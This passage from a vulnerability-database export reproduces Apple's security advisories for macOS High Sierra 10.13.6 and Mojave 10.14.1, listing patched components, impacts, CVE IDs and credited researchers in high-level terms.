You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan\n\nReleased July 9, 2018\n\n**Accounts**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to access local users AppleIDs\n\nDescription: A privacy issue in the handling of Open Directory records was addressed with improved indexing.\n\nCVE-2018-4470: Jacob Greenfield of Commonwealth School\n\nEntry added December 10, 2018\n\n**AMD**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to determine kernel memory layout\n\nDescription: An information disclosure issue was addressed by removing the vulnerable code.\n\nCVE-2018-4289: shrek_wzw of Qihoo 360 Nirvan Team\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4268: Mac working with Trend Micro's Zero Day Initiative\n\n**ATS**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be able to gain root privileges\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4285: Mohamed Ghannam (@_simo36)\n\n**Bluetooth**\n\nAvailable for: MacBook Pro (15-inch, 2018) and MacBook Pro (13-inch, 2018, Four Thunderbolt 3 Ports) \nOther Mac models were addressed with [macOS High Sierra 10.13.5](<https://support.apple.com/kb/HT208849>).\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. 
This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**CFNetwork**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Cookies may unexpectedly persist in Safari\n\nDescription: A cookie management issue was addressed with improved checks.\n\nCVE-2018-4293: an anonymous researcher\n\n**CoreCrypto**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4269: Abraham Masri (@cheesecakeufo)\n\n**CUPS**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A null pointer dereference was addressed with improved validation.\n\nCVE-2018-4276: Jakub Jirasek of Secunia Research at Flexera\n\nEntry added September 25, 2018\n\n**DesktopServices**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A local user may be able to view sensitive user information\n\nDescription: A permissions issue existed in which execute permission was incorrectly granted. This issue was addressed with improved permission validation.\n\nCVE-2018-4178: Arjen Hendrikse\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4456: Tyler Bohan of Cisco Talos\n\nEntry updated January 22, 2019\n\n**IOGraphics**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A local user may be able to read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. 
This was addressed with improved input validation.\n\nCVE-2018-4283: @panicaII working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: Systems using Intel\u00ae Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel\n\nDescription: Lazy FP state restore instead of eager save and restore of the state upon a context switch. Lazy restored states are potentially vulnerable to exploits where one process may infer register values of other processes through a speculative execution side channel that infers their value.\n\nAn information disclosure issue was addressed with FP/SIMD register state sanitization.\n\nCVE-2018-3665: Julian Stecklina of Amazon Germany, Thomas Prescher of Cyberus Technology GmbH (cyberus-technology.de), Zdenek Sojka of SYSGO AG (sysgo.com), and Colin Percival\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Mounting a maliciously crafted NFS network share may lead to arbitrary code execution with system privileges\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4259: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4286: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4287: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4288: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4291: Kevin Backhouse of Semmle and LGTM.com\n\nEntry added October 30, 2018\n\n**libxpc**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.5\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4280: Brandon Azad\n\n**libxpc**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A malicious application may be 
able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4248: Brandon Azad\n\n**LinkPresentation**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Perl**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2018-6797: Brian Carpenter\n\nCVE-2018-6913: GwanYeong Kim\n\nEntry added October 30, 2018\n\n**Ruby**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: Multiple issues in Ruby were addressed in this update.\n\nCVE-2017-0898\n\nCVE-2017-10784\n\nCVE-2017-14033\n\nCVE-2017-14064\n\nCVE-2017-17405\n\nCVE-2017-17742\n\nCVE-2018-6914\n\nCVE-2018-8777\n\nCVE-2018-8778\n\nCVE-2018-8779\n\nCVE-2018-8780\n\nEntry added October 30, 2018\n\n**WebKit**\n\nAvailable for: macOS High Sierra 10.13.5\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. 
This issue was addressed with improved input validation.\n\nCVE-2018-4274: Tomasz Bojarski\n\nEntry added July 28, 2020\n\n\n\n## Additional recognition\n\n**App Store**\n\nWe would like to acknowledge Jesse Endahl & Stevie Hryciw of Fleetsmith, and Max B\u00e9langer of Dropbox for their assistance.\n\nEntry added August 8, 2018\n\n**Help Viewer**\n\nWe would like to acknowledge Wojciech Regu\u0142a (@_r3ggi) of SecuRing for their assistance with four mitigations.\n\n**Kernel**\n\nWe would like to acknowledge juwei lin (@panicaII) of Trend Micro working with Trend Micro\u2019s Zero Day Initiative for their assistance.\n\n**Security**\n\nWe would like to acknowledge Brad Dahlsten of Iowa State University for their assistance.\n", "edition": 3, "modified": "2020-07-28T05:29:11", "published": "2020-07-28T05:29:11", "id": "APPLE:HT208937", "href": "https://support.apple.com/kb/HT208937", "title": "About the security content of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, Security Update 2018-004 El Capitan - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:20", "bulletinFamily": "software", "cvelist": ["CVE-2017-0898", "CVE-2018-4425", "CVE-2018-4354", "CVE-2018-4406", "CVE-2017-17405", "CVE-2018-4288", "CVE-2018-8778", "CVE-2018-4399", "CVE-2018-4368", "CVE-2017-17742", "CVE-2018-4400", "CVE-2018-4423", "CVE-2018-4407", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-4286", "CVE-2018-4468", "CVE-2018-4424", "CVE-2018-4410", "CVE-2018-4304", "CVE-2018-4340", "CVE-2018-4287", "CVE-2018-4395", "CVE-2018-4346", "CVE-2018-4403", "CVE-2018-4396", "CVE-2018-4295", "CVE-2018-4153", "CVE-2018-4369", "CVE-2018-4402", "CVE-2018-4187", "CVE-2018-4334", "CVE-2018-4413", "CVE-2018-4420", "CVE-2018-4242", "CVE-2018-4259", "CVE-2017-12613", "CVE-2018-4419", "CVE-2018-4310", "CVE-2017-14033", "CVE-2018-4398", "CVE-2018-4348", "CVE-2018-4401", "CVE-2018-3646", "CVE-2018-4389", "CVE-2018-6797", 
"CVE-2017-12618", "CVE-2018-4308", "CVE-2018-4371", "CVE-2018-4408", "CVE-2018-4412", "CVE-2018-4350", "CVE-2018-4415", "CVE-2018-4203", "CVE-2018-4326", "CVE-2018-4426", "CVE-2018-8777", "CVE-2018-4342", "CVE-2017-14064", "CVE-2018-4331", "CVE-2018-4393", "CVE-2018-4418", "CVE-2018-4394", "CVE-2018-4417", "CVE-2018-4411", "CVE-2018-4341", "CVE-2018-8779", "CVE-2018-3639", "CVE-2018-4291", "CVE-2018-6914", "CVE-2018-4126", "CVE-2018-3640", "CVE-2018-4422", "CVE-2018-4421"], "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Mojave 10.14.1, Security Update 2018-002 High Sierra, Security Update 2018-005 Sierra\n\nReleased October 30, 2018\n\n**afpserver**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A remote attacker may be able to attack AFP servers through HTTP clients\n\nDescription: An input validation issue was addressed with improved input validation.\n\nCVE-2018-4295: Jianjun Chen (@whucjj) from Tsinghua University and UC Berkeley\n\n**AppleGraphicsControl**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4410: an anonymous researcher working with Trend Micro's Zero Day 
Initiative\n\n**AppleGraphicsControl**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4417: Lee of the Information Security Lab Yonsei University working with Trend Micro's Zero Day Initiative\n\n**APR**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2017-12613: Craig Young of Tripwire VERT\n\nCVE-2017-12618: Craig Young of Tripwire VERT\n\nEntry updated February 15, 2019\n\n**ATS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4411: lilang wu moony Li of Trend Micro working with Trend Micro's Zero Day Initiative\n\n**ATS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2018-4308: Mohamed Ghannam (@_simo36)\n\n**Automator**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: A malicious application may be able to access restricted files\n\nDescription: This issue was addressed by removing additional entitlements.\n\nCVE-2018-4468: Jeff Johnson of underpassapp.com\n\nEntry added February 15, 2019\n\n**CFNetwork**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative\n\n**CoreAnimation**\n\nAvailable for: macOS Sierra 10.12.6, 
macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4415: Liang Zhuo working with Beyond Security\u2019s SecuriTeam Secure Disclosure\n\n**CoreCrypto**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An attacker may be able to exploit a weakness in the Miller-Rabin primality test to incorrectly identify prime numbers\n\nDescription: An issue existed in the method for determining prime numbers. This issue was addressed by using pseudorandom bases for testing of primes.\n\nCVE-2018-4398: Martin Albrecht, Jake Massimo and Kenny Paterson of Royal Holloway, University of London, and Juraj Somorovsky of Ruhr University, Bochum\n\n**CoreFoundation**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4412: The UK's National Cyber Security Centre (NCSC)\n\n**CUPS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: In certain configurations, a remote attacker may be able to replace the message content from the print server with arbitrary content\n\nDescription: An injection issue was addressed with improved validation.\n\nCVE-2018-4153: Michael Hanselmann of hansmi.ch\n\n**CUPS**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4406: Michael Hanselmann of hansmi.ch\n\n**Dictionary**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Parsing a maliciously crafted dictionary file may lead to disclosure of user 
information\n\nDescription: A validation issue existed which allowed local file access. This was addressed with input sanitization.\n\nCVE-2018-4346: Wojciech Regu\u0142a (@_r3ggi) of SecuRing\n\n**Dock**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: A malicious application may be able to access restricted files\n\nDescription: This issue was addressed by removing additional entitlements.\n\nCVE-2018-4403: Patrick Wardle of Digita Security\n\nEntry updated February 15, 2019\n\n**dyld**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14, macOS Sierra 10.12.6\n\nImpact: A malicious application may be able to elevate privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4423: Youfu Zhang of Chaitin Security Research Lab (@ChaitinTech)\n\nEntry updated November 16, 2018\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis\n\nDescription: An information disclosure issue was addressed with a microcode update. 
This ensures that older data read from recently-written-to addresses cannot be read via a speculative side-channel.\n\nCVE-2018-3639: Jann Horn (@tehjh) of Google Project Zero (GPZ), Ken Johnson of the Microsoft Security Response Center (MSRC)\n\n**EFI**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: A local user may be able to modify protected parts of the file system\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2018-4342: Timothy Perfitt of Twocanoes Software\n\n**Foundation**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4304: jianan.huang (@Sevck)\n\n**Grand Central Dispatch**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4426: Brandon Azad\n\n**Heimdal**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4331: Brandon Azad\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: Systems with microprocessors utilizing speculative execution and address translations may allow unauthorized disclosure of information residing in the L1 data cache to an attacker with local user access with guest OS privilege via a terminal page fault and a side-channel analysis\n\nDescription: An information disclosure issue was addressed by flushing the L1 data cache at the virtual machine entry.\n\nCVE-2018-3646: Baris Kasikci, Daniel Genkin, Ofir Weisse, and Thomas F. 
Wenisch of University of Michigan, Mark Silberstein and Marina Minkin of Technion, Raoul Strackx, Jo Van Bulck, and Frank Piessens of KU Leuven, Rodrigo Branco, Henrique Kawakami, Ke Sun, and Kekai Hu of Intel Corporation, Yuval Yarom of The University of Adelaide\n\n**Hypervisor**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption vulnerability was addressed with improved locking.\n\nCVE-2018-4242: Zhuo Liang of Qihoo 360 Nirvan Team\n\n**ICU**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14, macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted string may lead to heap corruption\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4394: Erik Verbruggen of The Qt Company\n\nEntry updated November 16, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4334: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2018-4396: Yu Wang of Didi Research America\n\nCVE-2018-4418: Yu Wang of Didi Research America\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4350: Yu Wang of Didi Research America\n\n**Intel Graphics Driver**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory 
initialization issue was addressed with improved memory handling.\n\nCVE-2018-4421: Tyler Bohan of Cisco Talos\n\nEntry added December 21, 2018\n\n**IOGraphics**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4422: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**IOHIDFamily**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4408: Ian Beer of Google Project Zero\n\nEntry updated August 1, 2019\n\n**IOKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4402: Proteas of Qihoo 360 Nirvan Team\n\n**IOKit**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to break out of its sandbox\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4341: Ian Beer of Google Project Zero\n\nCVE-2018-4354: Ian Beer of Google Project Zero\n\n**IOUserEthernet**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4401: Apple\n\n**IPSec**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: An 
out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4371: Tim Michaud (@TimGMichaud) of Leviathan Security Group\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed by removing the vulnerable code.\n\nCVE-2018-4420: Mohamed Ghannam (@_simo36)\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.6\n\nImpact: A malicious application may be able to leak sensitive user information\n\nDescription: An access issue existed with privileged API calls. This issue was addressed with additional restrictions.\n\nCVE-2018-4399: Fabiano Anemone (@anoane)\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4340: Mohamed Ghannam (@_simo36)\n\nCVE-2018-4419: Mohamed Ghannam (@_simo36)\n\nCVE-2018-4425: cc working with Trend Micro's Zero Day Initiative, Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero Day Initiative\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Mounting a maliciously crafted NFS network share may lead to arbitrary code execution with system privileges\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4259: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4286: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4287: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4288: Kevin Backhouse of Semmle and LGTM.com\n\nCVE-2018-4291: Kevin Backhouse of Semmle and LGTM.com\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An application may be able to read restricted 
memory\n\nDescription: A memory initialization issue was addressed with improved memory handling.\n\nCVE-2018-4413: Juwei Lin (@panicaII) of TrendMicro Mobile Security Team\n\n**Kernel**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An attacker in a privileged network position may be able to execute arbitrary code\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4407: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved size validation.\n\nCVE-2018-4424: Dr. Silvio Cesare of InfoSect\n\n**LinkPresentation**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added April 3, 2019\n\n**Login Window**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause a denial of service\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4348: Ken Gannon of MWR InfoSecurity and Christian Demko of MWR InfoSecurity\n\n**Mail**\n\nAvailable for: macOS Mojave 10.14\n\nImpact: Processing a maliciously crafted mail message may lead to UI spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4389: Dropbox Offensive Security Team, Theodor Ragnar Gislason of Syndis\n\n**mDNSOffloadUserClient**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was 
addressed with improved memory handling.\n\nCVE-2018-4326: an anonymous researcher working with Trend Micro's Zero Day Initiative, Zhuo Liang of Qihoo 360 Nirvan Team\n\n**MediaRemote**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A sandboxed process may be able to circumvent sandbox restrictions\n\nDescription: An access issue was addressed with additional sandbox restrictions.\n\nCVE-2018-4310: CodeColorist of Ant-Financial LightYear Labs\n\n**Microcode**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Systems with microprocessors utilizing speculative execution and that perform speculative reads of system registers may allow unauthorized disclosure of system parameters to an attacker with local user access via a side-channel analysis\n\nDescription: An information disclosure issue was addressed with a microcode update. This ensures that implementation specific system registers cannot be leaked via a speculative execution side-channel.\n\nCVE-2018-3640: Innokentiy Sennovskiy from BiZone LLC (bi.zone), Zdenek Sojka, Rudolf Marek and Alex Zuepke from SYSGO AG (sysgo.com)\n\n**NetworkExtension**\n\nAvailable for: macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Connecting to a VPN server may leak DNS queries to a DNS proxy\n\nDescription: A logic issue was addressed with improved state management.\n\nCVE-2018-4369: an anonymous researcher\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: Multiple buffer overflow issues existed in Perl\n\nDescription: Multiple issues in Perl were addressed with improved memory handling.\n\nCVE-2018-6797: Brian Carpenter\n\n**Ruby**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution\n\nDescription: Multiple issues in Ruby were addressed in this 
update.\n\nCVE-2017-0898\n\nCVE-2017-10784\n\nCVE-2017-14033\n\nCVE-2017-14064\n\nCVE-2017-17405\n\nCVE-2017-17742\n\nCVE-2018-6914\n\nCVE-2018-8777\n\nCVE-2018-8778\n\nCVE-2018-8779\n\nCVE-2018-8780\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: Processing a maliciously crafted S/MIME signed message may lead to a denial of service\n\nDescription: A validation issue was addressed with improved logic.\n\nCVE-2018-4400: Yukinobu Nagayasu of LAC Co., Ltd.\n\n**Security**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: A local user may be able to cause a denial of service\n\nDescription: This issue was addressed with improved checks.\n\nCVE-2018-4395: Patrick Wardle of Digita Security\n\n**Spotlight**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4393: Lufeng Li\n\n**Symptom Framework**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero Day Initiative\n\n**Wi-Fi**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.6, macOS Mojave 10.14\n\nImpact: An attacker in a privileged position may be able to perform a denial of service attack\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4368: Milan Stute and Alex Mariotto of Secure Mobile Networking Lab at Technische Universit\u00e4t Darmstadt\n\n\n\n## Additional recognition\n\n**Calendar**\n\nWe would like to acknowledge Matthew Thomas of Verisign for their assistance.\n\nEntry updated February 15, 2019\n\n**coreTLS**\n\nWe would like to 
acknowledge Eyal Ronen (Weizmann Institute), Robert Gillham (University of Adelaide), Daniel Genkin (University of Michigan), Adi Shamir (Weizmann Institute), David Wong (NCC Group), and Yuval Yarom (University of Adelaide and Data61) for their assistance.\n\nEntry added December 12, 2018\n\n**iBooks**\n\nWe would like to acknowledge Sem Voigtl\u00e4nder of Fontys Hogeschool ICT for their assistance.\n\n**Kernel**\n\nWe would like to acknowledge Brandon Azad for their assistance.\n\n**LaunchServices**\n\nWe would like to acknowledge Alok Menghrajani of Square for their assistance.\n\n**Quick Look**\n\nWe would like to acknowledge lokihardt of Google Project Zero for their assistance.\n\n**Security**\n\nWe would like to acknowledge Marinos Bernitsas of Parachute for their assistance.\n\n**Terminal**\n\nWe would like to acknowledge Federico Bento for their assistance.\n\nEntry updated February 3, 2020\n\n**Time Machine**\n\nWe would like to acknowledge Matthew Thomas of Verisign for their assistance.\n\nEntry added February 15, 2019\n", "edition": 3, "modified": "2020-07-27T08:14:47", "published": "2020-07-27T08:14:47", "id": "APPLE:HT209193", "href": "https://support.apple.com/kb/HT209193", "title": "About the security content of macOS Mojave 10.14.1, Security Update 2018-002 High Sierra, Security Update 2018-005 Sierra - Apple Support", "type": "apple", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}